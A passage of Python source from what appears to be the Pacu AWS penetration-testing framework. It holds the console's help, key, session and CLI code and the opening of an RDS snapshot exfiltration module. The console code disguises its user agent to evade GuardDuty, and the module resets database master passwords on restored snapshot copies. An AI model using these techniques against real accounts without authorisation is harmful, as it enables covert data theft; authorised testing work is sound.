        elif command_name == 'help':
            print('\n    help\n        Display information about all Pacu commands\n    help <module name>\n        Display information about a module\n')
        elif command_name == 'whoami':
            print('\n    whoami\n        Display information regarding to the active access keys\n')
        elif command_name == 'data':
            print('\n    data\n        Display all data that is stored in this session. Only fields with values will be displayed\n    data <service>\n       '
                  ' Display all data for a specified service in this session\n')
        elif command_name == 'services':
            print('\n    services\n        Display a list of services that have collected data in the current session to use with the "data"\n          '
                  'command\n')
        elif command_name == 'regions':
            print('\n    regions\n        Display a list of all valid AWS regions\n')
        elif command_name == 'update_regions':
            print('\n    update_regions\n        Run a script to update the regions database to the newest version\n')
        elif command_name == 'set_regions':
            print('\n    set_regions <region> [<region>...]\n        Set the default regions for this session. These space-separated regions will be used for '
                  'modules where\n          regions are required, but not supplied by the user. The default set of regions is every supported\n          '
                  'region for the service. Supply "all" to this command to reset the region set to the default of all\n          supported regions\n')
        elif command_name == 'run' or command_name == 'exec':
            print('\n    run/exec <module name>\n        Execute a module\n')
        elif command_name == 'set_keys':
            print('\n    set_keys\n        Add a set of AWS keys to the session and set them as the default\n')
        elif command_name == 'swap_keys':
            print('\n    swap_keys\n        Change the currently active AWS key to another key that has previously been set for this session\n')
        elif command_name == 'exit' or command_name == 'quit':
            print('\n    exit/quit\n        Exit Pacu\n')
        elif command_name == 'load_commands_file':
            print('\n    load_commands_file <commands_file>\n        Load an existing file with a set of commands to execute')
        else:
            print('Command or module not found. Is it spelled correctly? Try using the module search function.')
        return

    def display_module_help(self, module_name: str) -> None:
        module = import_module_by_name(module_name, include=['module_info', 'parser'])

        if module is not None:
            print('\n{} written by {}.\n'.format(module.module_info['name'], module.module_info['author']))

            if 'prerequisite_modules' in module.module_info and len(module.module_info['prerequisite_modules']) > 0:
                print('Prerequisite Module(s): {}\n'.format(module.module_info['prerequisite_modules']))

            if 'external_dependencies' in module.module_info and len(module.module_info['external_dependencies']) > 0:
                print('External dependencies: {}\n'.format(module.module_info['external_dependencies']))

            parser_help = module.parser.format_help()
            print(parser_help.replace(os.path.basename(__file__), 'run {}'.format(module.module_info['name']), 1))
            return

        else:
            print('Command or module not found. Is it spelled correctly? Try using the module search function, or "help" to view a list of commands.')
            return

    def list_modules(self, search_term, by_category=False):
        found_modules_by_category = dict()
        current_directory = os.getcwd()
        for root, directories, files in os.walk(Path(__file__).parent/'modules'):
            modules_directory_path = os.path.realpath(Path(__file__).parent/'modules')
            specific_module_directory = os.path.realpath(root)

            # Skip any directories inside module directories.
            if os.path.dirname(specific_module_directory) != modules_directory_path:
                continue
            # Skip the root directory.
            elif modules_directory_path == specific_module_directory:
                continue

            module_name = os.path.basename(root)

            for file in files:
                if file == 'main.py':
                    # Make sure the format is correct
                    module_path = str(Path('pacu/modules')/module_name/'main').replace('/', '.').replace('\\', '.')
                    # Import the help function from the module
                    module = __import__(module_path, globals(), locals(), ['module_info'], 0)
                    importlib.reload(module)
                    category = module.module_info['category']
                    services = module.module_info['services']

                    regions = []
                    for service in services:
                        regions += self.get_regions(service)

                    # Skip modules with no regions in the list of set regions.
                    if len(regions) == 0:
                        continue

                    # Searching for modules by category:
                    if by_category and search_term.upper() in category:
                        if category not in found_modules_by_category.keys():
                            found_modules_by_category[category] = list()

                        found_modules_by_category[category].append('  {}'.format(module_name))

                        if search_term:
                            found_modules_by_category[category].append('    {}\n'.format(module.module_info['one_liner']))

                    # Searching or listing modules without specifying a category:
                    elif not by_category and search_term in module_name:
                        if category not in found_modules_by_category.keys():
                            found_modules_by_category[category] = list()

                        found_modules_by_category[category].append('  {}'.format(module_name))

                        if search_term:
                            found_modules_by_category[category].append('    {}\n'.format(module.module_info['one_liner']))

        if found_modules_by_category:
            for category in self.CATEGORIES:
                if category in found_modules_by_category:
                    search_results = '\n'.join(found_modules_by_category[category]).strip('\n')
                    print('\n[Category: {}]\n\n{}'.format(category, search_results))
        else:
            print('\nNo modules found.')
        print()

    def set_keys(self, key_alias: str = None, access_key_id: str = None, secret_access_key: str = None, session_token: str = None):
        session = self.get_active_session()

        # If key_alias is None, then it's being run normally from the command line (set_keys),
        # otherwise it means it is set programmatically and we don't want any prompts if it is
        # done programatically
        if key_alias is None:
            self.print('Setting AWS Keys...')
            self.print('Press enter to keep the value currently stored.')
            self.print('Enter the letter C to clear the value, rather than set it.')
            self.print('If you enter an existing key_alias, that key\'s fields will be updated instead of added.\n')

        # Key alias
        if key_alias is None:
            new_value = self.input('Key alias [{}]: '.format(session.key_alias))
        else:
            new_value = key_alias.strip()
            self.print('Key alias [{}]: {}'.format(session.key_alias, new_value), output='file')
        if str(new_value.strip().lower()) == 'c':
            session.key_alias = None
        elif str(new_value) != '':
            session.key_alias = new_value.strip()

        # Access key ID
        if key_alias is None:
            new_value = self.input('Access key ID [{}]: '.format(session.access_key_id))
        else:
            new_value = access_key_id or ''
            self.print('Access key ID [{}]: {}'.format(session.access_key_id, new_value), output='file')
        if str(new_value.strip().lower()) == 'c':
            session.access_key_id = None
        elif str(new_value) != '':
            session.access_key_id = new_value.strip()

        # Secret access key (should not be entered in log files)
        if key_alias is None:
            if session.secret_access_key is None:
                new_value = input('Secret access key [None]: ')
            else:
                truncated_key = session.secret_access_key[0:int(len(session.secret_access_key) / 2)]
                new_value = input('Secret access key [{}{}]: '.format(truncated_key, '*' * int(len(session.secret_access_key) / 2)))
        else:
            new_value = secret_access_key or ''
        self.print('Secret access key [******]: ****** (Censored)', output='file')
        if str(new_value.strip().lower()) == 'c':
            session.secret_access_key = None
        elif str(new_value) != '':
            session.secret_access_key = new_value.strip()

        # Session token (optional)
        if key_alias is None:
            new_value = self.input('Session token (Optional - for temp AWS keys only) [{}]: '.format(session.session_token))
        else:
            new_value = session_token or ''
            if new_value is None:
                new_value = 'c'
            self.print('Session token [{}]: {}'.format(session.session_token, new_value), output='file')
        if str(new_value.strip().lower()) == 'c':
            session.session_token = None
        elif str(new_value) != '':
            session.session_token = new_value.strip()

        self.database.add(session)

        aws_key = session.get_active_aws_key(self.database)
        if aws_key:
            aws_key.key_alias = session.key_alias
            aws_key.access_key_id = session.access_key_id
            aws_key.secret_access_key = session.secret_access_key
            aws_key.session_token = session.session_token
        else:
            aws_key = AWSKey(
                session=session,
                key_alias=session.key_alias,
                access_key_id=session.access_key_id,
                secret_access_key=session.secret_access_key,
                session_token=session.session_token
            )
        self.database.add(aws_key)

        self.database.commit()

        if key_alias is None:
            self.print('\nKeys saved to database.\n')

    def swap_keys(self) -> None:
        session: PacuSession = self.get_active_session()

        # On attr-defined ignore: https://github.com/dropbox/sqlalchemy-stubs/issues/168
        aws_keys: List[AWSKey] = session.aws_keys.all()  # type: ignore[attr-defined]

        if not aws_keys:
            self.print('\nNo AWS keys set for this session. Run "set_keys" to add AWS keys.\n')
            return

        self.print('\nSwapping AWS Keys. Press enter to keep the currently active key.')

        print('AWS keys in this session:')

        for index, aws_key in enumerate(aws_keys, 1):
            if aws_key.key_alias == session.key_alias:
                print('  [{}] {} (ACTIVE)'.format(index, aws_key.key_alias))
            else:
                print('  [{}] {}'.format(index, aws_key.key_alias))

        choice = input('Choose an option: ')

        if not str(choice).strip():
            self.print('The currently active AWS key will remain active. ({})'.format(session.key_alias))
            return

        if not choice.isdigit() or int(choice) not in range(1, len(aws_keys) + 1):
            print('Please choose a number from 1 to {}.'.format(len(aws_keys)))
            return self.swap_keys()

        chosen_key = aws_keys[int(choice) - 1]
        session.key_alias = chosen_key.key_alias
        session.access_key_id = chosen_key.access_key_id
        session.secret_access_key = chosen_key.secret_access_key
        session.session_token = chosen_key.session_token
        self.database.add(session)
        self.database.commit()
        self.print('AWS key is now {}.'.format(session.key_alias))

    def check_sessions(self) -> None:
        sessions = self.database.query(PacuSession).all()

        if not sessions:
            session = self.new_session()

        else:
            print('Found existing sessions:')
            print('  [0] New session')

            for index, session in enumerate(sessions, 1):
                print('  [{}] {}'.format(index, session.name))

            choice = input('Choose an option: ')

            try:
                if int(choice) == 0:
                    session = self.new_session()
                else:
                    session = sessions[int(choice) - 1]
            except (ValueError, IndexError):
                print('Please choose a number from 0 to {}.'.format(len(sessions)))
                return self.check_sessions()

        session.activate(self.database)

    def list_sessions(self) -> None:
        active_session = self.get_active_session()
        all_sessions = self.database.query(PacuSession).all()

        print('Found existing sessions:')

        for index, session in enumerate(all_sessions, 0):
            if session.name == active_session.name:
                print('- ' + str(session.name) + ' (ACTIVE)')
            else:
                print('- ' + str(session.name))

        print('\nUse "swap_session" to change to another session.')

        return

    def new_session(self) -> PacuSession:
        session_data: Dict[str, str] = dict()
        name = None

        while not name:
            name = input('What would you like to name this new session? ').strip()
            if not name:
                print('A session name is required.')
            else:
                existing_sessions = self.database.query(PacuSession).filter(PacuSession.name == name).all()
                if existing_sessions:
                    print('A session with that name already exists.')
                    name = None

        session_data['name'] = name

        session = PacuSession(**session_data)
        self.database.add(session)
        self.database.commit()
        print('Session {} created.'.format(name))

        return session

    def delete_session(self) -> None:
        active_session = self.get_active_session()
        all_sessions = self.database.query(PacuSession).all()
        print('Delete which session?')

        for index, session in enumerate(all_sessions, 0):
            if session.name == active_session.name:
                print('  [{}] {} (ACTIVE)'.format(index, session.name))
            else:
                print('  [{}] {}'.format(index, session.name))

        choice = input('Choose an option: ')

        try:
            session = all_sessions[int(choice)]
            if session.name == active_session.name:
                print('Cannot delete the active session! Switch sessions and try again.')
                return
        except (ValueError, IndexError):
            print('Please choose a number from 0 to {}.'.format(len(all_sessions) - 1))
            return self.delete_session()

        self.database.delete(session)
        self.database.commit()

        print('Deleted {} from the database!'.format(session.name))
        print('Note that the output folder at ~/.local/share/pacu/sessions/{}/ will not be deleted. Do it manually '
              'if necessary.'.format(session.name))

        return

    def check_user_agent(self) -> None:
        session = self.get_active_session()

        if session.boto_user_agent is None:  # If there is no user agent set for this session already
            boto3_session = boto3.session.Session()
            ua = boto3_session._session.user_agent()
            if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower():  # If the local OS is Kali/Parrot/Pentoo Linux
                # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that...
                self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
                with open(Path(__file__).parent/'user_agents.txt', 'r') as f:
                    user_agents = f.readlines()
                user_agents = [agent.strip() for agent in user_agents]  # Remove random \n's and spaces
                new_ua = random.choice(user_agents)
                session.update(self.database, boto_user_agent=new_ua)
                self.print('  User agent for this session set to:')
                self.print('    {}'.format(new_ua))

    def get_boto_session(self, region: str = None) -> boto3.session.Session:
        session = self.get_active_session()

        if not session.access_key_id:
            raise UserWarning('  No access key has been set. Failed to generate boto3 Client.')

        if not session.secret_access_key:
            raise UserWarning('  No secret key has been set. Failed to generate boto3 Client.')

        return boto3.session.Session(
            region_name=region,
            aws_access_key_id=session.access_key_id,
            aws_secret_access_key=session.secret_access_key,
            aws_session_token=session.session_token,
        )

    def get_botocore_conf(
        self,
        region: Optional[str] = None,
        user_agent: Optional[str] = None,
        parameter_validation: bool = True,
    ) -> botocore.config.Config:
        session = self.get_active_session()

        # If there is not a custom user_agent passed into this function
        # and session.boto_user_agent is set, use that as the user agent
        # for this client. If both are set, the incoming user_agent will
        # override the session.boto_user_agent. If neither are set, it
        # will be None, and will default to the OS's regular user agent
        if user_agent is None and session.boto_user_agent is not None:
            user_agent = session.boto_user_agent

        return botocore.config.Config(  # type: ignore[attr-defined]
            region_name=region,
            user_agent=user_agent,  # If user_agent=None, botocore will use the real UA which is what we want
            retries={
                'max_attempts': 10,
                'mode': 'adaptive',
            },
            parameter_validation=parameter_validation,
        )

    def get_boto3_client(
            self,
            service: str,
            region: Optional[str] = None,
            user_agent: Optional[str] = None,
            parameter_validation: bool = True,
    ) -> Any:
        try:
            aws_sess = self.get_boto_session()
        except UserWarning as e:
            print(e.args)
            return None

        conf = self.get_botocore_conf(region, user_agent, parameter_validation)
        return aws_sess.client(service, config=conf)

    def get_boto3_resource(
            self,
            service: str,
            region: Union[str, None] = None,
            user_agent: Union[str, None] = None,
            parameter_validation: bool = True
    ) -> Any:
        try:
            aws_sess = self.get_boto_session()
        except UserWarning as e:
            print(e.args)
            return None

        conf = self.get_botocore_conf(region, user_agent, parameter_validation)
        return aws_sess.resource(service, region_name=region, config=conf)

    def initialize_tab_completion(self) -> None:
        try:
            import readline
            # Big thanks to samplebias: https://stackoverflow.com/a/5638688
            MODULES = []
            CATEGORIES = []

            for root, directories, files in os.walk(Path(__file__).parent/'modules'):
                modules_directory_path = os.path.realpath(Path(__file__)/'modules')
                category_path = os.path.realpath(root)

                # Skip any directories inside module directories.
                if os.path.dirname(category_path) != modules_directory_path:
                    continue
                # Skip the root directory.
                elif modules_directory_path == category_path:
                    continue

                for file in files:
                    if file == 'main.py':
                        module_name = os.path.basename(root)
                        MODULES.append(module_name)

                        # Make sure the format is correct
                        module_path = str(Path('pacu/modules')/module_name/'main').replace('/', '.').replace('\\', '.')

                        # Import the help function from the module
                        module = __import__(module_path, globals(), locals(), ['module_info'], 0)
                        importlib.reload(module)
                        CATEGORIES.append(module.module_info['category'])

            RE_SPACE = re.compile(r'.*\s+$', re.M)
            readline.set_completer_delims(' \t\n`~!@#$%^&*()=+[{]}\\|;:\'",<>/?')

            class Completer(object):
                def complete(completer, text, state):
                    buffer = readline.get_line_buffer()
                    line = readline.get_line_buffer().split()

                    # If nothing has been typed, show all commands. If help, exec, or run has been typed, show all modules
                    if not line:
                        return [c + ' ' for c in self.COMMANDS][state]

                    if len(line) == 1 and (line[0] == 'help'):
                        return [c + ' ' for c in MODULES + self.COMMANDS][state]

                    if len(line) == 1 and (line[0] == 'exec' or line[0] == 'run'):
                        return [c + ' ' for c in MODULES][state]

                    # account for last argument ending in a space
                    if RE_SPACE.match(buffer):
                        line.append('')

                    # Resolve command to the implementation function
                    if len(line) == 1:
                        cmd = line[0].strip()
                        results = [c + ' ' for c in self.COMMANDS if c.startswith(cmd)] + [None]

                    elif len(line) == 2:
                        cmd = line[1].strip()
                        if line[0].strip() == 'search':
                            results = [c + ' ' for c in MODULES + ['category'] if c.startswith(cmd)] + [None]
                        elif line[0].strip() == 'help':
                            results = [c + ' ' for c in MODULES + self.COMMANDS if c.startswith(cmd)] + [None]
                        else:
                            results = [c + ' ' for c in MODULES if c.startswith(cmd)] + [None]

                    elif len(line) == 3 and line[0] == 'search' and line[1] in ('cat', 'category'):
                        cmd = line[2].strip()
                        results = [c + ' ' for c in CATEGORIES if c.startswith(cmd)] + [None]

                    elif len(line) >= 3:
                        if line[0].strip() == 'run' or line[0].strip() == 'exec':
                            module_name = line[1].strip()
                            module = import_module_by_name(module_name, include=['module_info'])
                            autocomplete_arguments = module.module_info.get('arguments_to_autocomplete', list())
                            current_argument = line[-1].strip()
                            results = [c + ' ' for c in autocomplete_arguments if c.startswith(current_argument)] + [None]

                    return results[state]

            comp = Completer()
            readline.parse_and_bind("tab: complete")
            readline.set_completer(comp.complete)
        except Exception as error:  # noqa: F841 TODO: narrow down this exception
            # Error means most likely on Windows where readline is not supported
            # TODO: Implement tab-completion for Windows
            # print(error)
            pass

    def exit(self) -> None:
        sys.exit('SIGINT called')

    def idle(self) -> None:
        session = self.get_active_session()

        if session.key_alias:
            alias = session.key_alias
        else:
            alias = 'No Keys Set'

        command = input('Pacu ({}:{}) > '.format(session.name, alias))

        self.parse_command(command)

        self.idle()

    def run_cli(self, *args) -> None:
        self.database = get_database_connection(settings.DATABASE_CONNECTION_PATH)
        sessions: List[PacuSession] = self.database.query(PacuSession).all()

        arg = args[0]

        session: str = arg.session
        module_name: str = arg.module_name
        service = arg.data
        list_mods: bool = arg.list_modules
        list_cmd = ['ls']

        pacu_help: bool = arg.pacu_help
        pacu_help_cmd = ['help']

        if session is not None:
            session_names = [x.name for x in sessions]

            if session not in session_names:
                print('Session could not be found. Exiting...')
                self.exit()

            session_index = session_names.index(session)
            sessions[session_index].is_active = True

        if module_name is not None:
            module = ['exec', module_name]

            if arg.module_args is not None:
                args_list = arg.module_args.split(' ')
                for i in args_list:
                    if i != '':
                        module.append(i)

            if arg.exec is True:
                self.exec_module(module)

        if service is not None:
            if service == 'all':
                service_cmd = ['data']
            else:
                service_cmd = ['data', service.upper()]
            self.parse_data_command(service_cmd)

        if list_mods is True:
            self.parse_list_command(list_cmd)

        if pacu_help is True:
            self.parse_help_command(pacu_help_cmd)

        if arg.module_info is True:
            if module_name is None:
                print('Specify a module to get information on')
            pacu_help_cmd.append(module_name)
            self.parse_help_command(pacu_help_cmd)

        if arg.set_regions is not None:
            regions = arg.set_regions
            regions.insert(0, 'set_regions')
            self.parse_set_regions_command(regions)

        if arg.whoami is True:
            self.print_key_info()

    def run_gui(self) -> None:
        idle_ready = False

        while True:
            try:
                if not idle_ready:
                    try:
                        print("""
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀
 ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀
 ⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧
 ⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿
 ⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟
 ⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁
 ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀
 ⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀
 ⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿
 ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟
 ⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀
""")
                    except UnicodeEncodeError:
                        pass

                    set_sigint_handler(exit_text='\nA database must be created for Pacu to work properly.')
                    setup_database_if_not_present(settings.DATABASE_FILE_PATH)
                    set_sigint_handler(exit_text=None, value='SIGINT called')

                    self.database = get_database_connection(settings.DATABASE_CONNECTION_PATH)

                    self.check_sessions()

                    self.initialize_tab_completion()
                    display_pacu_help()

                    self.check_for_updates()

                    idle_ready = True

                self.check_user_agent()
                self.idle()

            except (Exception, SystemExit) as exception_value:
                exception_type, _, tb = sys.exc_info()

                if exception_type == SystemExit:
                    if 'SIGINT called' in exception_value.args:
                        print('\nBye!')
                        return
                    else:
                        traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(
                            ''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value)
                        )
                        session, global_data, local_data = get_data_from_traceback(tb)
                        self.log_error(
                            traceback_text,
                            exception_info='{}: {}\n\nPacu caught a SystemExit error. This may be due to incorrect module arguments received by argparse in '
                                           'the module itself. Check to see if any required arguments are not being received by the module when it '
                                           'executes.'.format(exception_type, exception_value),
                            session=session,
                            local_data=local_data,
                            global_data=global_data
                        )

                # Catch sqlalchemy error
                elif exception_type == exc.OperationalError:
                    traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(
                        ''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value)
                    )
                    session, global_data, local_data = get_data_from_traceback(tb)
                    self.log_error(
                        traceback_text,
                        exception_info='{}: {}\n\nPacu database error. This could be caused by a recent update in Pacu\'s database\'s structure. If your Pacu '
                                       'has been updated recently, try removing your old db.sqlite3 database file.'.format(exception_type, exception_value),
                        session=session,
                        local_data=local_data,
                        global_data=global_data
                    )

                else:
                    traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(
                        ''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value)
                    )
                    session, global_data, local_data = get_data_from_traceback(tb)
                    self.log_error(
                        traceback_text,
                        exception_info='{}: {}'.format(exception_type, exception_value),
                        session=session,
                        local_data=local_data,
                        global_data=global_data
                    )

                if not idle_ready:
                    print('Pacu is unable to start. Try backing up Pacu\'s sqlite.db file and deleting the old '
                          'version. If the error persists, try reinstalling Pacu in a new directory.')
                    return

    def run(self) -> None:
        parser = argparse.ArgumentParser()
        parser.add_argument('--session', required=False, default=None, help='<session name>', metavar='')
        parser.add_argument('--module-name', required=False, default=None, help='<module name>', metavar='')
        parser.add_argument('--data', required=False, default=None, help='<service name/all>', metavar='')
        parser.add_argument('--module-args', default=None, help='<--module-args=\'--regions us-east-1,us-east-1\'>', metavar='')
        parser.add_argument('--list-modules', action='store_true', help='List arguments')
        parser.add_argument('--pacu-help', action='store_true', help='List the Pacu help window')
        parser.add_argument('--module-info', action='store_true', help='Get information on a specific module, use --module-name')
        parser.add_argument('--exec', action='store_true', help='exec module')
        parser.add_argument('--set-regions', nargs='+', default=None, help='<region1 region2 ...> or <all> for all', metavar='')
        parser.add_argument('--whoami', action='store_true', help='Display information on current IAM user')
        args = parser.parse_args()

        if any([args.session, args.data, args.module_args, args.exec, args.set_regions, args.whoami]):
            if args.session is None:
                print('When running Pacu from the CLI, a session is necessary')
                exit()
            self.run_cli(args)
        elif any([args.list_modules, args.pacu_help, args.module_info]):
            self.check_for_updates()
            self.run_cli(args)
        else:
            self.run_gui()


if __name__ == '__main__':
    Main().run()



#!/usr/bin/env python3
import argparse
from pathlib import Path
import json
import random
import string

from botocore.exceptions import ClientError

module_info = {
    'name': 'rds__explore_snapshots',
    'author': 'Alexander Morgenstern alexander.morgenstern@rhinosecuritylabs.com',
    'category': 'EXFIL',
    'one_liner': 'Creates copies of running RDS databases to access protected information',
    'description': 'Creates a snapshot of all database instances, restores new database instances from those snapshots, and then changes the master password to allow access to the copied database. After the database has been created, the connection information is given. After interactions with the database are complete, the temporary resources are deleted. If there is an unexpected crash during the module\'s execution, the subsequent run of the module will attempt to clean up any leftover temporary resources.',
    'services': ['RDS'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': ['--regions'],
}
parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format us-east-1. Defaults to all session regions.')

TEMP_FILE = Path(__file__).parent / 'temp.json'
WAIT_CONFIG = {'Delay': 10}


def mark_temp(resource):
    if 'DBInstanceArn' in resource:
        key = 'Instances'
        identifier = resource['DBInstanceArn']
    else:
        key = 'Snapshots'
        identifier = resource['DBSnapshotArn']
    data = read_temp()
    data[key][identifier] = resource
    write_temp(data)


def remove_temp(resource):
    if 'DBInstanceArn' in resource:
        key = 'Instances'
        identifier = resource['DBInstanceArn']
    else:
        key = 'Snapshots'
        identifier = resource['DBSnapshotArn']
    data = read_temp()
    del data[key][identifier]
    write_temp(data)


def read_temp():
    with TEMP_FILE.open('r') as infile:
        data = json.load(infile)
    return data


def write_temp(data):
    with TEMP_FILE.open('w') as outfile:
        json.dump(data, outfile, default=str)


def cleanup(pacu):
    data = read_temp()
    success = True
    for instance in data['Instances']:
        client = pacu.get_boto3_client('rds', data['Instances'][instance]['AvailabilityZone'][:-1])
        if not delete_instance(client, instance, pacu.print):
            success = False
    for snapshot in data['Snapshots']:
        client = pacu.get_boto3_client('rds', data['Snapshots'][snapshot]['AvailabilityZone'][:-1])
        if not delete_snapshot(client, snapshot, pacu.print):
            success = False
    return success


def main(args, pacu):
    """Main module function, called from Pacu"""
    args = parser.parse_args(args)
    if args.regions:
        regions = args.regions.split(',')
    else:
